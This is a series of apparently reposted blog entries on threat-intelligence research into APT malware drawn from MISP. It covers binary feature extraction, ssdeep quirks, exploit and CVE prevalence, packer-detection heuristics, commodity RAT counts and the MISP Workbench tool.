Lastly, it’s worth mentioning that ssdeep hashes, just like any other statically retrieved attribute, only help describing the outer surface of a sample. It does not carry information about the purpose or behavior of a binary and is easily disturbed by runtime packers and might even fail its purpose after malware authors apply a simple change in their compiler settings.

Taking things further: MISP Workbench

Please note that, by now, this kind of APT research has been performed by designated threat research teams for a long time and presented techniques are not considered new. The community benefit we see here is the integration of our toolset into MISP’s open source code body, as well as providing results and conclusions to the broader public. Research of targeted attacks is difficult without access to a large malware set and high quality threat intelligence data.

So now here we are. With MISP Workbench the tools we developed and the data we gathered were integrated into the MISP platform in order to support incident responders and researchers to easily perform their own queries when investigating one or more events.

Workbench was built with the objective to incorporate all the presented features into one single tool. Also, it is intended to enhance the existing MISP dataset with a rich feature set, especially regarding the presented PE features. Workbench can now be used to easily group events by attacker tool sets; in connection with MISP Galaxy this is also possible with focus on dedicated adversaries. Workbench supports full text indexing and lookups for keywords, as well as picking through events on singular features or indicators.

Fine folks at CIRCL have built Workbench for standalone use, with a lightweight user interface. A more detailed description can be found here.

The following screenshot shows statistics about binary compilation timestamps within our targeted malware test set. One can quickly see, how 1970 and 1992 must have been very busy years for lots of malware authors. Err… kidding, of course. But it does seem obvious how compilation timestamps, or even just parts of compilation timestamps, can occasionally serve as an interesting grouping attribute.

5_3_data2

Furthermore, Workbench in combination with Galaxy, supplies information about threat actors and events linked to them. This enables the analyst to search for links among threat actors on a binary feature level.

5_3_grouping

As mentioned, the extracted PE features can be used for grouping as well. The following screenshot shows how the filename ‘chrome.exe’ seems to be an all-time favorite of The Dukes, a threat actor operating out of Russia.

5_3_orifname

Finally

And here it ends, this lengthy blog series on Kings In Your Castle. The work will continue, of course. The tools presented,  just as any information sharing platform such as MISP, live from the collective effort of contribution to the tool stack, the threat information base and the distribution chain. In that sense, questions and comments are welcome, just like pull requests, bug reports and feature ideas. At this point let me say thank you once more, to my co-sufferer Raphael Vinot, as well as the team at CIRCL, the team at ERNW and Troopers conference for letting us present our work as well as Morgan Marquis-Boire for supplying samples and ever more samples.

Happy APT hunting everyone 🙂

The Kings In Your Castle Part 4 – Packers, Crypters and a Pack of RATs

In part 4 of our series “The Kings In Your Castle”, we’re back with the question, what does sophistication even mean? I’ll be outlining what complexity from a malware analyst’s perspective means, why malware intends to be undecipherable and why it sometimes just wouldn’t even try. Also, this blog entry serves to present our findings on commodity RATs within the corpus of malware we analyzed, as part of our talk at Troopers conference in March.

If you are interested in previous parts of the series please check them out here, here and here.

What does sophistication even mean?

The complexity of software is a rather soft metric, that hasn’t undergone much scrutiny in definition. For a malware analyst, this sphere even takes on a whole lot of different shades, as malware by nature aims to hide its threats. At least most of it, as one would think?

For analysts, what poses challenges are techniques such as code obfuscation or the use of well-fortified crypters. What also presents a remarkable challenge  is structured application design, although this might sound somewhat counter-intuitive. Multi-component malware with a well thought-out object oriented design and highly dependent components cause more of a headache for an analyst than any crypter out there. In fact, many of the well-known high-profile attack toolsets aren’t protected by a packer at all. The assumption is, that for one, runtime packers potentially catch unwanted attention of security products; but also, for highly targeted attacks they might not even be necessary at all. Malware developers with sufficient dedication are very well able to hide a software’s purpose without the use of a runtime packer. So, why do we still see packed malware?

A software crypter is a piece of technology which obfuscates software and its intentions, but also to changes its appearance. Crypters and packers are frequently applied to malware in order to ensure the reusability of the actual malcode. That way, when malware is detected once, the same detection will not apply to the same malware running on a different system.

Let’s take a step back though. The ‘perfect targeted attack’ is performed with a toolset dedicated to one target only. We can conclude that a crypter is needed if either the authors aren’t capable of writing undetectable malware, or, more likely, if the malware is intended to be reused. This makes sense, if you reconsider, writing malware takes time and money, a custom attack toolset represents an actual (and quite substantial) investment.

Finally, with economical aspects in mind, we can conclude that attacks performed with plain tools are the more expensive ones, while attacks using packers and crypters to protect malware are less resource intensive.

4_1_sophistication

The actual hypothesis we had started our research with was, that most targeted malware comes without a crypter. In more detail, we put up the statement, that targeted malware was significantly less protected than random malicious software. Again, random malware doesn’t know its target and by definition is intended to infect a large number of individuals; while targeted malware supposedly is designed for a limited number of targets.

Packer Detection (Like PEiD Was Broken)

Now, the usage statistics of runtime packers and crypers would be easy to gather from our respective dataset, if the available state-of-the-art packer detection tools weren’t stuck somewhere in 1997. The question whether a file is packed or not in practice is not trivially answered. One of the tools that is frequently used to identify packers is named PEiD. PEiD applies pre-defined signatures to the first code bytes starting from the executable entry point, which easily fails if the code at the packed binary’s entry point changes only slightly.

Aiming for more accurate results, we decided to come up with our own packer evaluation. We put together a set of indicators for abnormal binary structures, which are frequently seen in relation with runtime packers. Please note, the indicators are just that – indicators. The evaluation algorithm leaves some space for discrepancies. In practice though, manual analysis of randomly picked samples has proven the evaluation to be reasonably precise.

We gathered the following PE attributes:

  • Section count smaller than 3
  • Count of TLS sections bigger than 0
  • No imphash value present, thus import section empty or not parseable
  • Entropy value of code section smaller than 6.0 or bigger than 6.7
  • Entry point located in section which is not named ‘.text’, ‘.itext’ or ‘.CODE’
  • Ratio of Windows API calls to file size smaller than 0.1

Of course, no single one of the gathered attributes is a surefire indicator in a packer evaluation process. In reality, some of the mentioned presumed anomalies are frequently seen within unpacked binaries, and depend, for example, on the executable’s compiler. Nevertheless, any of the mentioned features is reason enough to grow suspicion, and as mentioned before, the evaluation works rather reliably on our chosen dataset.

According to our algorithm the values weigh into an evaluation score, based on the final score an analyst can then draw his conclusion. It is worth noting at this point, that the chosen thresholds are quite sensitive, and one would expect to rather detect too many “potentially-packed” samples, instead of too few.

Further details about our packer evaluation method can be found within the published code.

The results can be found in the following charts, showing the evaluation values in relation with sample counts. The maximum score a sample can reach on our scale is 220, meaning that all eval attributes exceed the chosen threshold. The following graphics show the evaluation performed on a benign sample set, on a targeted malware sample set and on a random malware sample set. Attention should be paid to the sample frequency count on the y-pane of the graph.

benign
The benign set
targeted
The targeted malware set
random
The random malware set

The graphs show very well, how roughly a third of the benign samples show low rated indicators; while for the random malware sample set, it is less than a third of the overall set showing no indicators, while more than a third of the set show remarkably high rated indicators. It shall be mentioned, that a look into benign samples rated at 40-50 resulted in the finding, that most of them were packed with UPX, a binary packer used mainly for binary compression.

The remarkable bit at this point is that the set of targeted malware binaries has the overall lowest count of packer indicators. This leaves us with two possible conclusions. Following our hypothesis that targeted malware is significantly less protected by crypters than random malware, we take this result as a proof.

On the other hand, what surely biases the result, is that the chosen attributes are potentially influenced by compilers used to compile the given binaries. This means though, as the results for the targeted set are notably homogenous, that the larger part of targeted malware within our dataset has probably not experienced exotic compilers either. As a research idea for future analysis I’d like to put up the somewhat far-fetched hypothesi, that most targeted malware is written in C/C++ and compiled using Visual Studio compiler. Curious, anyone?

Commodity RATs

Taking the question of malware sophistication further, in the past the analysis community was frequently astonished in the light of yet another incredibly complex targeted malware campaign. While it is true that certain targets require a high level of attack sophistication, most campaigns do not require components for proprietary systems or extremely stealthy methods. An interesting case of high profile attacks being carried out with commodity malware was uncovered last year, when CitizenLab published their report about Packrat. Packrat is a South American threat actor, who has been active for around seven years, performing targeted espionage and disinformation campaigns in various South American countries. The actor is most known for targeting, among others, Alberto Nisman, the late Argentinean prosecutor, raising a case against the Argentinean government in 2015.

Whoever is responsible for said campaigns did have a clear image of whom to target. The actor certainly possessed sufficient personal and financial resources, yet made a conscious decision to not invest in a high-end toolchain. Looking into the malware set used by Packrat, one finds a list of so called commodity RATs, off-the-shelf malware used for remote access and espionage. The list of RATs includes CyberGate, XTremeRAT and AlienSpy; those tools themselves are well-known malware families associated with espionage.

Again, using repackaged commodity RATs is notably cheaper than writing custom malware. The key to to remaining stealthy in this case is the usage of crypters and packers. In the end though, by not burning resources on a custom toolchain, the attacker can apply his resources otherwise – potentially even on increasing his target count.

Hunting down a RAT pack

Looking at the above facts, one question emerges: how prevalent are pre-built RATs within the analysis set at all? To establish a count for commodity RATs count we again relied on detection names of Microsoft Defender. The anti-virus solution from Microsoft has shown in the past to be rather slow in picking up new detections, while providing quite accurate results once detections are deployed to the engines. Accuracy at this point includes certain reliability when it comes to naming malware.

For evaluation, we chose to search for the following list of commodity malware:

  • DarkComet (Fynloski)
  • BlackShades (njRat, Bladabindi)
  • Adwind
  • PlugX
  • PoisonIvy (Poison)
  • XTremeRAT (Xtrat)
  • Handpicked RAT binaries

The selected set is what we noted seeing when going through the malware corpus manually, please note though, the list of existing commodity RATs is by far longer.

The so to say “lazy king of APTing” is PlugX. The commodity RAT popped up in all together 15 different events listed in the MISP database.

4_2_plugx

The winner in sample numbers was Adwind, a Java based RAT, dedicated to infect different platforms. Adwind itself is malware, that has been sold under different names, including Frutas RAT and Unrecom RAT. Security firm Fidelis published nice insights on Adwind, under the much appreciated title “RAT in a jar”.

The following graphic shows the total number of RATs and related events, found within our data set of 326 events containing 8.927 malware binaries.

4_3_ratpack

In total, we counted that almost a quarter of inspected events made use of one or another RAT. Looking at the sample set, 1/9th of the total set is composed of pre-built RATs. These numbers are rather high, considering that, at least in the heads of analysts, targeted malware is complex and sophisticated.

Still, though, why do we even bother with high numbers of commodity malware? For one, as mentioned before, they help driving down attack cost. Furthermore, they provide functionality that is quite advanced from the beginning, equipping even unskilled attackers with a Swiss Army Knife of malware they couldn’t implement themselves, even if they tried really hard. These do-it-yourself APT tools enable wannabe spies with little budgets, growing the number of potential offenders.

Furthermore, off-the-shelf RATs have been seen in use by certain advanced attackers. They could lead to confusion about the actual offender, as they do not allow for attribution on the base of the binaries at all. In other words, one would not know whether he is being targeted by a script kiddie or a nation state actor. Currently, it remains unclear whether commodity RATs have been used in an attribution concealment approach, but the assumption does lie close.

The Kings In Your Castle Part 3 -Ssdeep being fuzzy while exploits are being scarce

Welcome back, still on it? This is part 3 of our blog series, if you’re curious about part 1 and 2, please check them out here and here. This time I’m happy to introduce a set of borderline funny findings and tackle one of the hypotheses we put together for Raphael Vinot’s and my talk “The Kings In Your Castle”, presented at this year’s Troopers Conference in Heidelberg. I will discuss our findings regarding exploits present in known targeted attacks, the obstacles we faced during analysis and how we worked our way around. So, sit back, relax, here we go.

Curiosities

As you might be aware of, most data sets come with information, as well as most show one or another curiosity. Finding curiosities means learning literally unexpected things, which is why researchers jump at those with the passion of a hungry wolf. Thus, let me start the list of our findings with a curiosity.

While performing clustering on ssdeep hashes we found something we dubbed sddeep collisions, due to lack of better naming. Ssdeep is a program for computing context triggered piecewise hashes. These so called fuzzy hashes, as opposed to cryptographic hashes, do not uniquely identify a given data blob. They are calculated piecewise and are able to identify shared byte sequences among two targets. They are frequently used to ‘describe’ malicious binaries, in order to be able to match with similar binaries and eventually find groups of malware samples or even identify malware families.

The nature of piecewise hashes though implies, that hashes of two binaries cannot be identical, if the binaries show differences. Hence, it is a curious finding, that a number of unique samples within our set showed identical ssdeep hashes. Without spending too much time picking at the implementation of the fuzzy hashing algorithm itself, we assume that ssdeep does not consider the entire binary for hashing. We found a case, where 5 MB of empty padding were no reason for ssdeep to show any difference in the resulting fuzzy hash.

ssdeep

More than padding, ssdeep on some occasions indeed missed significant differences in the data sections of compared binaries. Given that analysts and corporations use ssdeep in work benches and production systems we found it worth a mention, that identical fuzzy hashes do by no means proof, that the compared binaries are identical.

diffs

We learned another curiosity when randomly staring at the gathered data. It is fascinating how the human eye manages to find patterns, and indeed very instructive before starting to implement queries or planning for application of machine learning. This way we saw, that for example compilation timestamps of binaries usually follow lose patterns within an event. A number of events though show outliers when it comes to timestamps; such as a binary compiled in 1996 while others are compiled post-2007, or a binary with a stamp from 2036. Of course, such outliers can have multiple explanations. Ones that come to mind the fastest are either the timestamps are falsified, the attackers forgot to falsify all timestamps, the campaign made use of readily compiled (old) tools, or maybe a runtime packer was used which falsifies the timestamps without explicit intention of the attackers.

20136time

One conclusion though lies at hand. To freely quote a splendid APT researcher, attackers learn just like we do and improve over time, which implies that they might have made more mistakes in the past. Thus, by analyzing historical data about a campaign or group one might be able to learn unexpected tidbits. Moreover, by looking at things learned by the attacker as in changes in malware and intrusion techniques, one might gather insights about obstacles the attackers faced in the past. Adoption of a runtime packer or adding of a stealth module to a given RAT might expose, that the attacker’s tools at some point were detected by security software.

1970time

 

OMFG!! They used e.x.p.l.o.i.t.s.!!1!

Like in real life, humans tend to conclude that a digital attack, which caused big damage, naturally came with big power. In the world of cyber though, this equation has a lot of unknowns. In fact, the success of an attack and the damage it can cause are influenced by many factors, that are independent of an attacker’s capabilities and wealth. While not true in all cases, mostly, the possession of one or more 0-days involves some level of resources or at least explicit know-how combined with engineering time.

This leads to a natural assumption: Folks who do APTs involving 0-days must be either rich, or very very dedicated. Or both. Or do they? When Stuxnet finally happened, the general public seemed to believe that APT goes hand in hand with 0-day. A considerable time span passed by, understanding started to sink in, that targeted attacks can have all sorts of faces, and barely any post-Stuxnet attack looked anything like what we now call “the first cyber weapon”.

Until today, analysts seem to have settled for the consciousness that Word Macros are just as dangerous to organizations as the latest Flash exploit. There always is someone to open the damn document.

Finally, what this leaves us with is a set of uncertainties. How important are exploits in the APT world? How frequently are they used, how common is the use of precious 0-days? This is the fog we meant to shed some light on.

 

Exploit prevalence at a glance

In the mass malware scenery, the number of malware strains and infection campaigns that make active use of exploits is rather low, it feels, and seemingly even declined; at least since attackers found out that Macro downloaders do the job just as well. It won’t fail the attentive reader; Word Macros are a lot easier to write and cheaper to get hold of. And back here we are, reducing the cost of an attack allows to maximize the number of potential targets. It’s all about resources.

But let us get to the numbers. In total, we analyzed 326 events within our final analysis set, of which 54 were labeled to involve one or more exploits. Such labels are usually tags of CVE numbers that are added by the initial reporter of an event. About these tags we do know, that a present tag is a strong indicator for an actual exploit being involved (given analysts didn’t make things up); the lack of any tag does not proof at all though that no exploits were used. As a counter metric, we utilized detection names of Microsoft Defender, filtering for names containing one or another CVE number. This way we detected a total of 68 events involving exploits.

Juggling numbers, with considerations of potentially missed detections in mind, roughly a fifth of the analyzed events involved the usage of exploits. With all potential data incorrectness in mind, we are very confident to state that is it not a majority of targeted attacks that involves exploits.

 

The APT exploit landscape

Relying on tags that are present in the MISP data set, we went on to evaluate the exploits we indeed did see. The graphic below shows a chart of CVE numbers, sorted first by tag counts, secondly by year. The numbers refer to the number of events that make use of the listed CVEs.

It is worth mentioning, that human analysts as well as security software tend to be more reliable in labelling of well-known exploits, than fresh ones or even unknown ones. This chart cannot be used to determine which attacks involved 0-day exploits; in fact, none of the data we got at hand can.

cves

What it does show though is how the curve from frequently to non-frequently seen CVEs holds remarkably old vulnerabilities in the top spots. Absolutely killing it is CVE-2012-0158, a vulnerability within an MS Office OCX library. It can be triggered through a malicious Word document. The vulnerability has long been fixed by Microsoft, but, perhaps, not all Office installations are updated all that frequently? Who knows.

Furthermore, we can see that only a minority of 7 CVE numbers can be called more or less up to date. Given that our data collection ended January 2016, vulnerabilities from 2015 are considered fresh (enough). A total of 12 events involved exploits for non-cyber-stoneage vulnerabilities.

Exceptionally interesting is place number three on the list, CVE-2015-5119, sported by a total of five events. This vulnerability has a history, indeed.

 

HackingTeam exploit gone wild

CVE-2015-5119 is a vulnerability in Adobe Flash, which got leaked with the tremendous breach of the Italian offensive security company HackingTeam last year. The vulnerability was reported and fixed soon after the breach, but nevertheless made it into at least one exploit pack and the toolsets of four quite well known APT groups. According to our data, Group Wekby and a not closer identified spearphishing campaign targeting US government institutions adopted respective exploits right after the breach went public, in July 2015.

The most recent spotting of CVE-2015-5119 within our data happened beginning of 2016 when it was seen in context with BlackEnergy, the notorious malware that took the Ukrainian power grid offline end of 2015.

5119

 

Discussing the results

The numbers in the dark, or, everything we do not know, is a significant blind spot to our dataset. There are two considerable unknowns. For one, we do not know whether the data is complete. Two, we do not know whether the labels we retrieved are correct.

Concerning problem number 1, intentionally incomplete reports aside, it is very well possible that an attack is detected and remediated, but the actual infection vector never recovered. In the case of an exploit being used, given for example that it is not contained in an e-mail or a file, the forensic reconstruction of the entire intrusion path can be challenging. A good example of such a case and also a very instructive read on the topic poses Phineas Fisher’s write up of the HackingTeam breach.

Problem number 2, incorrect labeling, stems from the fact that determining a CVE number for an actual exploit involves careful analysis work of a specialist. In practice, deriving CVE numbers from AV detection names is “cheap” and works reasonably well, but relies on the respective analysts doing a scrupulous job when looking into the sample. Nevertheless, mistakes are actually quite possible.

As in all given cases, I am happy to receive suggestions on how to improve on both shortcomings. Meanwhile, we present the discussed numbers with a pinch of salt on the side.

 

The Kings In Your Castle Part #2 – Dataset and feature extraction

Welcome back to my series of write-ups for “The Kings In Your Castle – All the lame threats that own you, but will never make you famous”. This series covers a project I presented together with Raphael Vinot from CIRCL Luxembourg at Troopers conference in March. If you missed the start, you can find it here.

O’right lets go 😀

TTPAs – Tools, Techniques, Procedures and Actors

The primary aim in the toolification process was to extract accurate binary features, that would help us describe the binaries in relation to the Event data stored in MISP. Therefor we took the feature extraction a step further than usual IOC creation would (Indicators of Compromise).

IOCs are indicators, which describe malware used in an attack or attributes of an attack. They are easy and comparably quick to create, and then distributed and leveraged to scan computers or networks for compromises. They defer from classical, heuristical malware detection, as indicators are not limited to a per-file basis but can also describe domain names of remote servers, names of files created by malware or IP addresses.

Despite their many advantages though, IOCs trade rather shallow features. Domain names, file names or strings within binaries can be easily changed in the course of an operation and at will of the actor. A goal of our research was to extract more granular file features from different domains than the usual IOCs cover, in a sense, more “expensive” features, that we considered less volatile than domain names. This way we expected to be able to find links among different events contained in MISP, that the usual indicators miss. In a targeted operation, it is considered expensive to change a toolset, rewrite malware or switch infection vectors like for example the purchase of a new exploit. Currently used indicators lack capabilities to describe “expensive metrics”, hence the idea to widen the feature space.

However, extraction of binary features is not at all a trivial task. The technical implementation of feature extraction aside, it lies within the nature of malicious binaries to hide their features as thorough as possible; any features, that is. Runtime packing, obfuscation and sandbox evasion are just a few of many techniques that malware authors use to hinder analysis, which in general difficults feature extraction.

The following lists show attributes that were gathered from MISP, as well as those we extracted from the malicious binaries. The attributes are all gained in a static manner, meaning without the execution of binaries. Sole static analysis is frequently faster than dynamic analysis, the tools more portable and large scale analysis more scalable. Next to that we worked with the hypothesis, that targeted malware frequently comes unpacked and without the use of obfuscation. On the other hand, if an actor decides to rely on runtime packing, it should be an interesting question, whether he decides whether to use a custom packer or a commercial one, and whether samples were individually packed, with a dedicated packer. One would think ‘no’, right?

I will go into more details on the packer-or-no-packer questions in a follow up blogpost. For the time being, I’ll ask you for the benefit of doubt that our test set of binaries supplied us with considerably useful data. Here goes our feature list, fitted with short explanations of the underlying trail of thought.

MISP data

  • Event ID
  • Event description
  • Event Submission date
  • CVE numbers associated with malware of given event
  • Domains associated with malware of given event

The attributes we pulled out of MISP mainly describe the respective events, which the binary hashes of our set are linked to. This information is highly valuable, as it puts the malware into context. Frequently events in MISP are linked to vendor reports, which provide a plentitude of context for an operation. Furthermore, the event submission date roughly indicates the time when the operation was reported. CVE numbers are considered an indicator, whether the operation involved exploits. This is a rather soft metric, the lack of an entry for a CVE number does not at all proof that no exploits were being used by a given malicious actor. Nonetheless, listed CVE numbers are valuable information.

Sample data

  • MD5
  • SHA1
  • Associated Event ID
  • Filetype
  • Filesize
  • Ssdeep hash
  • Detectionname of Microsoft Defender

Sample data is a set of descriptive features, associated with any filetype. In the course of our research we put our main focus on Windows executable files, as these pose the biggest group among the analyzed sample set. Our decision to add detection names from the Microsoft Defender anti-virus solution bases on Microsofts accuracy in assigning names to malware. This knowledge we draw from sole experience, although empirical tests have shown excellent results in the past.

An interesting attribute among this set is the ssdeep hash of a file. Ssdeep is an algorithm, which allows to calculate a fuzzy hash of a given data blob. Fuzzy hashes do not uniquely identify the base data, but are calculated piece-wise. This way ssdeep makes it possible to determine similarities among files, and even draw conclusions about the degree of difference between two given files. For more information about ssdeep and fuzzy hashes please visit the sourceforge website. A drawback of fuzzy hashing is, that the required computing load for comparing similarities among binaries increases considerably with the number of binaries.

Executable data

  • Compilation time stamp
  • Imphash value
  • Entry point address
  • Section count
  • Original filename
  • Section names for sections 1-6
  • Section sizes for sections 1-6
  • Section entropies for sections 1-6
  • Number of TLS sections
  • Entry point section
  • Count of calls to Windows APIs
  • Ratio of API call count to filesize

Finally, for the subset of Windows executable files we collected a wealth of descriptive indicators, which apply to meta-information and the internal structure of compiled binaries. Compilation time stamps of binaries can be easily changed, that is true, therefor they have to be taken with a pinch of salt. Singular cases though have shown, that looking at a campaign over a period of time, following related events on MISP that is, sometimes yields unexpected information “leaks”. This means, actors might follow the habit to falsify timestamps, at the same time though erring is human, and sometimes we encounter binaries with seemingly real time stamps. That said, obviously it is of interest to find attacks related to one specific incident, as historical data can reveal unknown traits of a specific actor.

A number of PE attributes serves the detection of packed binaries. The count of PE sections, section names, sizes and entropy, the count of TLS sections (Thread Local Storage) and the section of entry point for example are considered indicators, whether a runtime packer protects the executable. This is interesting information by itself, as it can be concluded which actors use packed malware, which don’t, and which packing habits the different actors have.

Next to that, the attributes also serve to determine the similarity among binaries. While on unpacked binaries, the attributes are highly dependent on the compiler used to compile the binary, on packed executables the same data shows similarities of the various packers.

Two rather uncommon binary metrics we came up with is the total count of calls to Windows APIs within the code and the API call count to file size ratio. The primary consideration hereby is, that packed or protected executables show little interaction with the Win32 API. Another interest in these metrics though is, that the API calls within a binary relate to the actual binary structure. While code changes or additions within pieces of malware very likely change fuzzy hashes, the imphash, the filesize and section attributes, the changes of the API call scheme should remain considerably small.

Data about the data

The beauty of the data collection process, is that it left us with a set of malicious binaries, that are somewhat guaranteed to have been part of a targeted attack approach at some point in the timeline of their use. Furthermore, with the help of MISP we are able to put the binaries into context, as we know in many cases which campaign they were involved with.

For picking events from MISP we applied a lose set of criteria. MISP’s events are pre-classified by the submitter, where a threat level of medium or high indicates, that this event is likely of a targeted nature. From this group we handpicked events, where the description suggested it deals with a known or at least an identified threat actor, or where the nature of the malware clearly suggested a targeted background; like e.g. themed spear phishing would.

The initial data collection started November 2016, so the total set of events only includes cases submitted to MISP until middle of December 2016. However, in follow-up work some of the feature correlation procedures have been adopted by MISP itself. For more details please refer to the website.

Please note, this procedure leaves quite some room for incorrectness. We assume by default, that indicators reported by vendors and their context are correctly associated. This is not always the case, as we found out while performing tests; in some rare occasions data in vendor reports has turned out to be incorrect. As of now we do not have insight which percentage of reports shows errors. Furthermore, the events contained in MISP only show information that actually is reported, meaning that attacks which by the time of analysis yet have to be discovered as well as attributes which are potentially missing from reports pose a blind spot to our research.

Finally, we started off with a set of 501 events, which we assumed to contain information about targeted attacks, containing a total of 15.347 malware samples. From this set we removed another subset of events, which we determined to be overlapping with another event of the same attacker or incident. Duplicate entries happen, as MISP is not striving for accuracy but for completeness. The cleanup left us with a set of 326 events and 8.927 samples.

filetypes_basicdata

The graphic shows the file types of the entire sample set. It can be seen, that Win32 PE executables are rather dominant. This is explained by the heavy use of repackaged commodity malware by some actors, but does not represent the general distribution of file types per event. Nevertheless, PE32 is the most important file type within the analyzed sample set, counting more than 11.000 out of the total corpus of 15.347 samples.

In the next blogpost I’ll be introducing our results of an exploit-per-APT analysis, and write about one or another curiosity we found within our final data set.